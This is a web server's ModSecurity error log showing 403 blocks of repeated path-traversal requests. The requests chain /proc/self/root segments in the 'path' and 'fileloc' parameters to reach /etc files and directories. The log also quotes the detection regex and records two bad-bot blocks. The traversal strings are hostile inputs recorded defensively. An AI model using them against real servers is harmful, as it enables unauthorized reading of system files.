[Wed Mar 18 09:30:22.083633 2026] [:error] [pid 15826:tid 140411733534464] [client 74.7.241.31:57756] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/chkconfig.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqa3uoXxyEfFpUF8f9g6AAAAUE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 09:30:23.612981 2026] [:error] [pid 30077:tid 140411741927168] [client 74.7.243.128:36734] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqa3_u8EFLIOrSqIpv3mAAAAkA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 09:30:28.799448 2026] [:error] [pid 11816:tid 140411716749056] [client 74.7.243.128:36736] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqa5Ow_le52K8_3pV3SYgAAAgM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 09:31:05.022973 2026] [:error] [pid 17887:tid 140411691570944] [client 74.7.243.128:37454] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqbCQkwaGbbGflqUZADOAAAAMY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 09:31:10.728479 2026] [:error] [pid 30077:tid 140411699963648] [client 74.7.243.128:43054] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqbDvu8EFLIOrSqIpv3vQAAAkU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 09:31:16.525127 2026] [:error] [pid 29882:tid 140411699963648] [client 74.7.243.128:46652] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqbFEzinOy1jxa1j4cHRgAAAQU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 09:31:49.611206 2026] [:error] [pid 17887:tid 140411658000128] [client 74.7.241.31:57770] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/var/run/initramfs/state/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqbNQkwaGbbGflqUZADYgAAAMo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/var/run/initramfs/state/etc
[Wed Mar 18 09:31:50.935205 2026] [:error] [pid 15826:tid 140411641214720] [client 74.7.241.31:49470] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/bash_completion.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqbNuoXxyEfFpUF8f9hFgAAAUw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 09:32:26.309382 2026] [:error] [pid 15826:tid 140411632822016] [client 74.7.241.31:49476] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/prelink.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqbWuoXxyEfFpUF8f9hPAAAAU0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 09:32:28.815914 2026] [:error] [pid 30077:tid 140411565680384] [client 74.7.241.31:54668] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/bash_completion.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqbW_u8EFLIOrSqIpv32gAAAlU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 09:32:33.041113 2026] [:error] [pid 19507:tid 140411649607424] [client 74.7.243.128:46658] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqbYdY0UrI5A3LftIyXRgAAAYs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 09:32:34.579044 2026] [:error] [pid 15826:tid 140411616036608] [client 74.7.241.31:54678] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqbYuoXxyEfFpUF8f9hQQAAAU8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 09:32:53.132408 2026] [:error] [pid 17887:tid 140411582465792] [client 74.7.243.128:60110] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqbdQkwaGbbGflqUZADigAAANM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 09:32:56.574256 2026] [:error] [pid 15826:tid 140411649607424] [client 74.7.243.128:53588] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqbeOoXxyEfFpUF8f9hVAAAAUs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 09:33:16.842895 2026] [:error] [pid 11816:tid 140411674785536] [client 74.7.228.61:34178] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abqbjOw_le52K8_3pV3SxgAAAgg"]
[Wed Mar 18 09:33:18.631777 2026] [:error] [pid 19507:tid 140411716749056] [client 74.7.244.43:58866] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abqbjdY0UrI5A3LftIyXagAAAYM"]
[Wed Mar 18 09:33:44.192371 2026] [:error] [pid 31803:tid 140411699963648] [client 74.7.243.128:53592] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/system-release-cpe"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqbqOyqAr6etmhZHNqyagAAAEU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 09:33:46.527560 2026] [:error] [pid 15051:tid 140411741927168] [client 74.7.243.128:37910] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqbqimAPhZkrhU8w4lgTgAAAIA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 09:33:47.895198 2026] [:error] [pid 19507:tid 140411666392832] [client 74.7.243.128:37920] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqbq9Y0UrI5A3LftIyXgwAAAYk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 09:33:50.305183 2026] [:error] [pid 11816:tid 140411582465792] [client 74.7.243.128:37932] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqbrew_le52K8_3pV3S5AAAAhM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 09:33:51.868013 2026] [:error] [pid 17653:tid 140411557287680] [client 74.7.243.128:37288] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqbr8df6f5d65gmYZTHzAAAAtY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 09:33:53.150000 2026] [:error] [pid 15826:tid 140411691570944] [client 74.7.243.128:37302] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqbseoXxyEfFpUF8f9hewAAAUY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 09:33:54.550119 2026] [:error] [pid 31803:tid 140411590858496] [client 74.7.243.128:37306] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id 